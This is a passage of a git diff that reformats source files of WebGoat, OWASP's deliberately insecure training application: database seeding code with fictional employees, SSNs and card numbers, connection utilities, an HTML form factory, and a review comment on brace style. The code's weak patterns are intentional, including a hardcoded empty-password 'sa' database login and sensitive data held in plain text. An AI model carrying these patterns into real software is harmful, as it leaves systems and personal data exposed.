(102, 'Moe', 'Stooge', '936-18-4524','moe'," - + "'CSO','443-938-5301', '3013 AMD Ave', 'New York, NY', 112, 03082003, 140000, 'NA', 0, 'moe@stooges.com', 0101013, " - + "'Hit Curly over head', 'Very dominating over Larry and Curly')"; - - String 
insertData3 = "INSERT INTO employee VALUES (103, 'Curly', 'Stooge', '961-08-0047','curly'," - + "'Technician','410-667-6654', '1112 Crusoe Lane', 'New York, NY', 102, 02122001, 50000, 'NA', 0, 'curly@stooges.com', 0101014, " - + "'Hit Moe back', 'Owes three-thousand to company for fradulent purchases')"; - - String insertData4 = "INSERT INTO employee VALUES (104, 'Eric', 'Walker', '445-66-5565','eric'," - + "'Engineer','410-887-1193', '1160 Prescott Rd', 'New York, NY', 107, 12152005, 13000, 'NA', 0, 'eric@modelsrus.com',0101013, " - + "'Bothering Larry about webgoat problems', 'Late. Always needs help. Too intern-ish.')"; - - String insertData5 = "INSERT INTO employee VALUES (105, 'Tom', 'Cat', '792-14-6364','tom'," - + "'Engineer','443-599-0762', '2211 HyperThread Rd.', 'New York, NY', 106, 01011999, 80000, '5481360857968521', 30000, 'tom@wb.com', 0, " - + "'NA', 'Co-Owner.')"; - - String insertData6 = "INSERT INTO employee VALUES (106, 'Jerry', 'Mouse', '858-55-4452','jerry'," - + "'Human Resources','443-699-3366', '3011 Unix Drive', 'New York, NY', 102, 01011999, 70000, '6981754825013564', 20000, 'jerry@wb.com', 0, " - + "'NA', 'Co-Owner.')"; - - String insertData7 = "INSERT INTO employee VALUES (107, 'David', 'Giambi', '439-20-9405','david'," - + "'Human Resources','610-521-8413', '5132 DIMM Avenue', 'New York, NY', 102, 05011999, 100000, '6981754825018101', 10000, 'david@modelsrus.com', 061402, " - + "'Hacked into accounting server. Modified personal pay.', 'Strong work habbit. Questionable ethics.')"; - - String insertData8 = "INSERT INTO employee VALUES (108, 'Bruce', 'McGuirre', '707-95-9482','bruce'," - + "'Engineer','610-282-1103', '8899 FreeBSD Drive ', 'New York, NY', 107, 03012000, 110000, '6981754825854136', 30000, 'bruce@modelsrus.com', 061502, " - + "'Tortuous Boot Camp workout at 5am. 
Employees felt sick.', 'Enjoys watching others struggle in exercises.')"; - - String insertData9 = "INSERT INTO employee VALUES (109, 'Sean', 'Livingston', '136-55-1046','sean'," - + "'Engineer','610-878-9549', '6422 dFlyBSD Road', 'New York, NY', 107, 06012003, 130000, '6981754825014510', 5000, 'sean@modelsrus.com', 072804, " - + "'Late to work 30 days in row due to excessive Halo 2', 'Has some fascination with Steelers. Go Ravens.')"; - - String insertData10 = "INSERT INTO employee VALUES (110, 'Joanne', 'McDougal', '789-54-2413','joanne'," - + "'Human Resources','610-213-6341', '5567 Broadband Lane', 'New York, NY', 106, 01012001, 90000, '6981754825081054', 300, 'joanne@modelsrus.com', 112005, " - + "'Used company cc to purchase new car. Limit adjusted.', 'Finds it necessary to leave early every day.')"; - - String insertData11 = "INSERT INTO employee VALUES (111, 'John', 'Wayne', '129-69-4572', 'john'," - + "'CTO','610-213-1134', '129 Third St', 'New York, NY', 112, 01012001, 200000, '4437334565679921', 300, 'john@guns.com', 112005, " - + "'', '')"; - String insertData12 = "INSERT INTO employee VALUES (112, 'Neville', 'Bartholomew', '111-111-1111', 'socks'," - + "'CEO','408-587-0024', '1 Corporate Headquarters', 'San Jose, CA', 112, 03012000, 450000, '4803389267684109', 300000, 'neville@modelsrus.com', 112005, " - + "'', '')"; - - statement.executeUpdate(insertData1); - statement.executeUpdate(insertData2); - statement.executeUpdate(insertData3); - statement.executeUpdate(insertData4); - statement.executeUpdate(insertData5); - statement.executeUpdate(insertData6); - statement.executeUpdate(insertData7); - statement.executeUpdate(insertData8); - statement.executeUpdate(insertData9); - statement.executeUpdate(insertData10); - statement.executeUpdate(insertData11); - statement.executeUpdate(insertData12); - - } - - - private void createRolesTable(Connection connection) throws SQLException - { - Statement statement = connection.createStatement(); - - try - { - 
String dropTable = "DROP TABLE roles"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error: unable to drop roles"); - } - - try - { - String createTable = "CREATE TABLE roles (" - + "userid INT NOT NULL," + "role VARCHAR(10) NOT NULL," - + "PRIMARY KEY (userid, role)" + ")"; - - statement.executeUpdate(createTable); - } - catch (SQLException e) - { - System.out.println("Error: Unable to create role table"); - } - - String insertData1 = "INSERT INTO roles VALUES (101, 'employee')"; - String insertData2 = "INSERT INTO roles VALUES (102, 'manager')"; - String insertData3 = "INSERT INTO roles VALUES (103, 'employee')"; - String insertData4 = "INSERT INTO roles VALUES (104, 'employee')"; - String insertData5 = "INSERT INTO roles VALUES (105, 'employee')"; - String insertData6 = "INSERT INTO roles VALUES (106, 'hr')"; - String insertData7 = "INSERT INTO roles VALUES (107, 'manager')"; - String insertData8 = "INSERT INTO roles VALUES (108, 'employee')"; - String insertData9 = "INSERT INTO roles VALUES (109, 'employee')"; - String insertData10 = "INSERT INTO roles VALUES (110, 'hr')"; - String insertData11 = "INSERT INTO roles VALUES (111, 'admin')"; - String insertData12 = "INSERT INTO roles VALUES (112, 'admin')"; - - statement.executeUpdate(insertData1); - statement.executeUpdate(insertData2); - statement.executeUpdate(insertData3); - statement.executeUpdate(insertData4); - statement.executeUpdate(insertData5); - statement.executeUpdate(insertData6); - statement.executeUpdate(insertData7); - statement.executeUpdate(insertData8); - statement.executeUpdate(insertData9); - statement.executeUpdate(insertData10); - statement.executeUpdate(insertData11); - statement.executeUpdate(insertData12); - } - - - private void createAuthTable(Connection connection) throws SQLException - { - Statement statement = connection.createStatement(); - - try - { - String dropTable = "DROP TABLE auth"; - statement.executeUpdate(dropTable); - } - 
catch (SQLException e) - { - System.out.println("Error: unable to drop auth"); - } - - try - { - String createTable = "CREATE TABLE auth (" - + "role VARCHAR(10) NOT NULL," - + "functionid VARCHAR(20) NOT NULL," - + "PRIMARY KEY (role, functionid)" + ")"; - - statement.executeUpdate(createTable); - } - catch (SQLException e) - { - System.out.println("Error: unable to create auth table"); - } - - String insertData1 = "INSERT INTO auth VALUES('employee', 'Logout')"; - String insertData2 = "INSERT INTO auth VALUES('employee', 'ListStaff')"; - String insertData3 = "INSERT INTO auth VALUES('employee', 'ViewProfile')"; - String insertData4 = "INSERT INTO auth VALUES('employee', 'EditProfile')"; - String insertData4_1 = "INSERT INTO auth VALUES('employee', 'SearchStaff')"; - String insertData4_2 = "INSERT INTO auth VALUES('employee', 'FindProfile')"; - String insertData5 = "INSERT INTO auth VALUES('manager', 'Logout')"; - String insertData6 = "INSERT INTO auth VALUES('manager', 'ListStaff')"; - String insertData7 = "INSERT INTO auth VALUES('manager', 'ViewProfile')"; - String insertData7_1 = "INSERT INTO auth VALUES('manager', 'SearchStaff')"; - String insertData7_2 = "INSERT INTO auth VALUES('manager', 'FindProfile')"; - // String insertData8 = "INSERT INTO auth VALUES('manager', 'EditProfile')"; - // String insertData9 = "INSERT INTO auth VALUES('manager', 'CreateProfile')"; - // String insertData10 = "INSERT INTO auth VALUES('manager', 'DeleteProfile')"; - // String insertData11 = "INSERT INTO auth VALUES('manager', 'UpdateProfile')"; - String insertData12 = "INSERT INTO auth VALUES('hr', 'Logout')"; - String insertData13 = "INSERT INTO auth VALUES('hr', 'ListStaff')"; - String insertData14 = "INSERT INTO auth VALUES('hr', 'ViewProfile')"; - String insertData15 = "INSERT INTO auth VALUES('hr', 'EditProfile')"; - String insertData16 = "INSERT INTO auth VALUES('hr', 'CreateProfile')"; - String insertData17 = "INSERT INTO auth VALUES('hr', 'DeleteProfile')"; - String 
insertData18 = "INSERT INTO auth VALUES('hr', 'UpdateProfile')"; - String insertData18_1 = "INSERT INTO auth VALUES('hr', 'SearchStaff')"; - String insertData18_2 = "INSERT INTO auth VALUES('hr', 'FindProfile')"; - String insertData19 = "INSERT INTO auth VALUES('admin', 'Logout')"; - String insertData20 = "INSERT INTO auth VALUES('admin', 'ListStaff')"; - String insertData21 = "INSERT INTO auth VALUES('admin', 'ViewProfile')"; - String insertData22 = "INSERT INTO auth VALUES('admin', 'EditProfile')"; - String insertData23 = "INSERT INTO auth VALUES('admin', 'CreateProfile')"; - String insertData24 = "INSERT INTO auth VALUES('admin', 'DeleteProfile')"; - String insertData25 = "INSERT INTO auth VALUES('admin', 'UpdateProfile')"; - String insertData25_1 = "INSERT INTO auth VALUES('admin', 'SearchStaff')"; - String insertData25_2 = "INSERT INTO auth VALUES('admin', 'FindProfile')"; - - // Add a permission for the webgoat role to see the source. - // The challenge(s) will change the default role to "challenge" - String insertData26 = "INSERT INTO auth VALUES('" - + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOURCE - + "')"; - String insertData27 = "INSERT INTO auth VALUES('" - + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWHINTS - + "')"; - // Add a permission for the webgoat role to see the solution. 
- // The challenge(s) will change the default role to "challenge" - String insertData28 = "INSERT INTO auth VALUES('" - + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOLUTION - + "')"; - - statement.executeUpdate(insertData1); - statement.executeUpdate(insertData2); - statement.executeUpdate(insertData3); - statement.executeUpdate(insertData4); - statement.executeUpdate(insertData4_1); - statement.executeUpdate(insertData4_2); - statement.executeUpdate(insertData5); - statement.executeUpdate(insertData6); - statement.executeUpdate(insertData7); - statement.executeUpdate(insertData7_1); - statement.executeUpdate(insertData7_2); - // statement.executeUpdate(insertData8); - // statement.executeUpdate(insertData9); - // statement.executeUpdate(insertData10); - // statement.executeUpdate(insertData11); - statement.executeUpdate(insertData12); - statement.executeUpdate(insertData13); - statement.executeUpdate(insertData14); - statement.executeUpdate(insertData15); - statement.executeUpdate(insertData16); - statement.executeUpdate(insertData17); - statement.executeUpdate(insertData18); - statement.executeUpdate(insertData18_1); - statement.executeUpdate(insertData18_2); - statement.executeUpdate(insertData19); - statement.executeUpdate(insertData20); - statement.executeUpdate(insertData21); - statement.executeUpdate(insertData22); - statement.executeUpdate(insertData23); - statement.executeUpdate(insertData24); - statement.executeUpdate(insertData25); - statement.executeUpdate(insertData25_1); - statement.executeUpdate(insertData25_2); - statement.executeUpdate(insertData26); - statement.executeUpdate(insertData27); - statement.executeUpdate(insertData28); - } - - - private void createOwnershipTable(Connection connection) - throws SQLException - { - Statement statement = connection.createStatement(); - - try - { - String dropTable = "DROP TABLE ownership"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error: unable to 
drop ownership"); - } - - try - { - String createTable = "CREATE TABLE ownership (" - + "employer_id INT NOT NULL," + "employee_id INT NOT NULL," - + "PRIMARY KEY (employee_id, employer_id)" + ")"; - - statement.executeUpdate(createTable); - } - catch (SQLException e) - { - System.out.println("Error: unable to create ownership table"); - } - - String inputData = "INSERT INTO ownership VALUES (112, 101)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 102)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 103)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 104)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 105)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 106)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 107)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 108)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 109)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 110)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 111)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (112, 112)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (102, 101)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 102)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 103)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 104)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 105)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO 
ownership VALUES (102, 106)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 107)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 108)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 109)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 110)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (102, 111)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (111, 101)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 102)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 103)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 104)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 105)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 106)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 107)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 108)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 109)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 110)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (111, 111)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (106, 105)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (106, 106)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (106, 110)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (101, 101)"; - statement.executeUpdate(inputData); - - inputData = "INSERT 
INTO ownership VALUES (103, 103)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (107, 104)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (107, 108)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (107, 109)"; - statement.executeUpdate(inputData); - inputData = "INSERT INTO ownership VALUES (107, 107)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (105, 105)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (110, 110)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (104, 104)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (108, 108)"; - statement.executeUpdate(inputData); - - inputData = "INSERT INTO ownership VALUES (109, 109)"; - statement.executeUpdate(inputData); - - } - - - //-------------------------------------------------------------------------- - // - // End of WebGoat Financials - // - //-------------------------------------------------------------------------- - - /** - * Description of the Method - * - * @param connection Description of the Parameter - * - * @exception SQLException Description of the Exception - */ - public void makeDB(Connection connection) throws SQLException - { - System.out.println("Successful connection to database"); - createUserDataTable(connection); - createLoginTable(connection); - createUserAdminTable(connection); - createProductTable(connection); - createMessageTable(connection); - createEmployeeTable(connection); - createRolesTable(connection); - createAuthTable(connection); - createOwnershipTable(connection); - createWeatherDataTable(connection); - System.out.println("Success: creating tables."); - } } 
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java b/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
index b208677d8..abb047f8e 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.session;
 import java.io.IOException;
@@ -8,42 +9,40 @@ import java.sql.ResultSetMetaData;
 import java.sql.SQLException;
 import java.util.HashMap;
 import java.util.Map;
-
 import org.apache.ecs.MultiPartElement;
 import org.apache.ecs.html.B;
 import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-/*******************************************************************************
+
+/***************************************************************************************************
  *
  *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  *
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  *
  * Getting Source ==============
  *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  *
  * For details, please see http://code.google.com/p/webgoat/
- *
+ *
  * @author Jeff Williams Aspect Security
  */
 public class DatabaseUtilities
@@ -51,121 +50,119 @@ public class DatabaseUtilities
 private static Map connections = new HashMap();
 private static Map dbBuilt = new HashMap();
-
- public static Connection getConnection(WebSession s)
- throws ClassNotFoundException, SQLException
+
+ public static Connection getConnection(WebSession s) throws ClassNotFoundException, SQLException
 {
 return getConnection(s.getUserName(), s.getWebgoatContext());
 }
-
- public static synchronized Connection getConnection(String user, WebgoatContext context)
- throws ClassNotFoundException, SQLException
+
+ public static synchronized Connection getConnection(String user, WebgoatContext context)
+ throws ClassNotFoundException, SQLException
 {
 Connection conn = connections.get(user);
- if (conn != null && !conn.isClosed())
- return conn;
+ if (conn != null && !conn.isClosed()) return conn;
 conn = makeConnection(user, context);
 connections.put(user, conn);
-
- if (dbBuilt.get(user) == null) {
+
+ if (dbBuilt.get(user) == null)
+ {
 new CreateDB().makeDB(conn);
 dbBuilt.put(user, Boolean.TRUE);
 }
-
+
 return conn;
 }
-
+
 public static synchronized void returnConnection(String user)
 {
 try
 {
- Connection connection = connections.get(user);
- if (connection == null || connection.isClosed())
- return;
-
- if (connection.getMetaData().getDatabaseProductName().toLowerCase().contains("oracle"))
- connection.close();
- }
- catch (SQLException sqle)
+ Connection connection = connections.get(user);
+ if (connection == null || connection.isClosed()) return;
+
+ if (connection.getMetaData().getDatabaseProductName().toLowerCase().contains("oracle")) connection.close();
+ } catch (SQLException sqle)
 {
 sqle.printStackTrace();
 }
 }
-
- private static Connection makeConnection(String user, WebgoatContext context)
- throws ClassNotFoundException, SQLException
- {
+
+ private static Connection makeConnection(String user, WebgoatContext context) throws ClassNotFoundException,
+ SQLException
+ {
 Class.forName(context.getDatabaseDriver());
- if (context.getDatabaseConnectionString().contains("hsqldb"))
- return getHsqldbConnection(user, context);
-
+ if (context.getDatabaseConnectionString().contains("hsqldb")) return getHsqldbConnection(user, context);
+
 String userPrefix = context.getDatabaseUser();
 String password = context.getDatabasePassword();
 String url = context.getDatabaseConnectionString();
 return DriverManager.getConnection(url, userPrefix + "_" + user, password);
- }
+ }
- private static Connection getHsqldbConnection(String user, WebgoatContext context)
- throws ClassNotFoundException, SQLException
+ private static Connection getHsqldbConnection(String user, WebgoatContext context) throws ClassNotFoundException,
+ SQLException
 {
 String url = context.getDatabaseConnectionString().replaceAll("\\$\\{USER\\}", user);
 return DriverManager.getConnection(url, "sa", "");
 }
- /**
- * Description of the Method
- *
- * @param results Description of the Parameter
- * @param resultsMetaData Description of the Parameter
- *
- * @return Description of the Return Value
- *
- * @exception IOException Description of the Exception
- * @exception SQLException Description of the Exception
- */
- public static MultiPartElement writeTable(ResultSet results,
- ResultSetMetaData resultsMetaData) throws IOException, SQLException
- {
- int numColumns = resultsMetaData.getColumnCount();
- results.beforeFirst();
- if (results.next())
+ /**
+ * Description of the Method
+ *
+ * @param results
+ * Description of the Parameter
+ * @param resultsMetaData
+ * Description of the Parameter
+ *
+ * @return Description of the Return Value
+ *
+ * @exception IOException
+ * Description of the Exception
+ * @exception SQLException
+ * Description of the Exception
+ */
+ public static MultiPartElement writeTable(ResultSet results, ResultSetMetaData resultsMetaData) throws IOException,
+ SQLException
 {
- Table t = new Table(1); // 1 = with border
- t.setCellPadding(1);
+ int numColumns = resultsMetaData.getColumnCount();
+ results.beforeFirst();
- TR tr = new TR();
-
- for (int i = 1; i < (numColumns + 1); i++)
- {
- tr.addElement(new TD(new B(resultsMetaData.getColumnName(i))));
- }
-
- t.addElement(tr);
- results.beforeFirst();
-
- while (results.next())
- {
- TR row = new TR();
-
- for (int i = 1; i < (numColumns + 1); i++)
+ if (results.next())
 {
- String str = results.getString(i);
- if (str == null)
- str = "";
- row.addElement(new TD(str.replaceAll(" ", " ")));
+ Table t = new Table(1); // 1 = with border
+ t.setCellPadding(1);
+
+ TR tr = new TR();
+
+ for (int i = 1; i < (numColumns + 1); i++)
+ {
+ tr.addElement(new TD(new B(resultsMetaData.getColumnName(i))));
+ }
+
+ t.addElement(tr);
+ results.beforeFirst();
+
+ while (results.next())
+ {
+ TR row = new TR();
+
+ for (int i = 1; i < (numColumns + 1); i++)
+ {
+ String str = results.getString(i);
+ if (str == null) str = "";
+ row.addElement(new TD(str.replaceAll(" ", " ")));
+ }
+
+ t.addElement(row);
+ }
+
+ return (t);
+ }
+ else
+ {
+ return (new B("Query Successful; however no data was returned from this query."));
 }
-
- t.addElement(row);
- }
-
- return (t);
 }
- else
- {
- return (new B(
- "Query Successful; however no data was returned from this query."));
- }
- }
-
+ }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java b/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
index 70484ff1d..547c89fd3 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.session;
 import java.util.Iterator;
 import java.util.List;
 import java.util.StringTokenizer;
 import java.util.Vector;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
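Review bot: The reformatted bodies of `getConnection`, `returnConnection`, `makeConnection` and `writeTable` now put a guard's statement on the same line as its `if` with no braces (`if (conn != null && !conn.isClosed()) return conn;`, `if (connection == null || connection.isClosed()) return;`, `if (str == null) str = "";`), which breaks with the braced style used for every other block in this hunk and makes those guards easy to mis-edit when a second statement is added later. Keeping each as a braced block, e.g. `if (conn != null && !conn.isClosed()) { return conn; }`, costs nothing and matches the surrounding code. Separately, the rewrapped `} catch (SQLException sqle)` in `returnConnection` still reports only via `sqle.printStackTrace()`, so a failed `close()` of a cached connection is invisible to anyone reading the application log; routing it through whatever logger the project uses would let operators notice connection handling problems.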
@@ -21,695 +21,726 @@ import org.apache.ecs.html.TH; import org.apache.ecs.html.TR; import org.apache.ecs.html.U; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams (jeff.williams@aspectsecurity.com) - * @created October 29, 2003 + * + * @author Jeff Williams (jeff.williams@aspectsecurity.com) + * @created October 29, 2003 */ public class ECSFactory { - /** - * Description of the Field - */ + /** + * Description of the Field + */ - public final static String ON = "On"; + public final static String ON = "On"; - /** - * Description of the Field - */ + /** + * Description of the Field + */ - public final static String PASSWORD = "Password"; + public final static String PASSWORD = "Password"; + /** + * Don't let anyone instantiate this class + */ - /** - * Don't let anyone instantiate this class - */ - - private ECSFactory() - {} - - - /** - * Description of the Method - * - * @param name Description of the Parameter - * @param value Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makeBox(String name, String value) - { - - Input i = new Input(Input.CHECKBOX, name, ON); - - i.setChecked(value.equals(ON)); - - return (i); - } - - - /** - * Description of the Method - * - * @param text Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makeButton(String text) - { - - Input b = new Input(); - - b.setType(Input.SUBMIT); - b.setValue(text); - b.setName(Input.SUBMIT); - - return (b); - } - - public static Element makeButton(String text, String onClickFunction) - { - - Input b = 
(Input)makeButton(text); - b.setOnClick(onClickFunction); - - return (b); - } - - - /** - * Description of the Method - * - * @param labeltext Description of the Parameter - * @param value Description of the Parameter - * @param e Description of the Parameter - * @return Description of the Return Value - */ - - public static TR makeField(String labeltext, String value, Element e) - { - - TD left = new TD().setAlign("right"); - - Label label = new Label().addElement(labeltext); - - left.addElement(label); - - TD right = new TD().setAlign("left"); - - right.addElement(e); - - TR row = new TR(); - - row.addElement(left); - - row.addElement(right); - - return (row); - } - - - /** - * Description of the Method - * - * @param labeltext Description of the Parameter - * @param name Description of the Parameter - * @param value Description of the Parameter - * @param size Description of the Parameter - * @return Description of the Return Value - */ - - public static TR makeField(String labeltext, String name, String value, - int size) - { - - Input field = new Input().setName(name).setValue(value).setSize(size) - .setMaxlength(size); - - // double check in case someone means to make a * starred out password field - - if (name.equals(PASSWORD)) + private ECSFactory() { - - field.setType(Input.PASSWORD); - } - return (makeField(labeltext, value, field)); - } + /** + * Description of the Method + * + * @param name + * Description of the Parameter + * @param value + * Description of the Parameter + * @return Description of the Return Value + */ - - /** - * Description of the Method - * - * @param label Description of the Parameter - * @param type Description of the Parameter - * @param name Description of the Parameter - * @param value Description of the Parameter - * @param alignment Description of the Parameter - * @param selected Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makeInput(String label, String type, String 
name, - boolean value, boolean selected, String alignment) - { - - return makeInput(label, type, name, new Boolean(value).toString(), - selected, alignment); - } - - - /** - * Description of the Method - * - * @param label Description of the Parameter - * @param type Description of the Parameter - * @param name Description of the Parameter - * @param value Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makeInput(String label, String type, String name, - String value) - { - - return makeInput(label, type, name, value, new Boolean(value) - .booleanValue(), "RIGHT"); - } - - - /** - * Description of the Method - * - * @param label Description of the Parameter - * @param type Description of the Parameter - * @param name Description of the Parameter - * @param value Description of the Parameter - * @param alignment Description of the Parameter - * @param selected Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makeInput(String label, String type, String name, - String value, boolean selected, String alignment) - { - - ElementContainer ec = new ElementContainer(); - - if (!alignment.equalsIgnoreCase("LEFT")) + public static Element makeBox(String name, String value) { - ec.addElement(new StringElement(label)); + Input i = new Input(Input.CHECKBOX, name, ON); + i.setChecked(value.equals(ON)); + + return (i); } - Input input = new Input(type, name, value); + /** + * Description of the Method + * + * @param text + * Description of the Parameter + * @return Description of the Return Value + */ - ec.addElement(input); - - if (alignment.equalsIgnoreCase("LEFT")) + public static Element makeButton(String text) { - ec.addElement(new StringElement(label)); + Input b = new Input(); + b.setType(Input.SUBMIT); + b.setValue(text); + b.setName(Input.SUBMIT); + + return (b); } - if (type.equalsIgnoreCase("CHECKBOX")) + public static Element makeButton(String text, String 
onClickFunction) { - input.setChecked(selected); + Input b = (Input) makeButton(text); + b.setOnClick(onClickFunction); + return (b); } - return (ec); - } + /** + * Description of the Method + * + * @param labeltext + * Description of the Parameter + * @param value + * Description of the Parameter + * @param e + * Description of the Parameter + * @return Description of the Return Value + */ - - /** - * Description of the Method - * - * @param text Description of the Parameter - * @param name Description of the Parameter - * @param value Description of the Parameter - * @return Description of the Return Value - */ - - public static A makeLink(String text, String name, String value) - { - - String href = "attack?" + name; - - if (value.length() > 0) + public static TR makeField(String labeltext, String value, Element e) { - href = href + "=" + value; + TD left = new TD().setAlign("right"); + Label label = new Label().addElement(labeltext); + + left.addElement(label); + + TD right = new TD().setAlign("left"); + + right.addElement(e); + + TR row = new TR(); + + row.addElement(left); + + row.addElement(right); + + return (row); } - A a = new A(href); + /** + * Description of the Method + * + * @param labeltext + * Description of the Parameter + * @param name + * Description of the Parameter + * @param 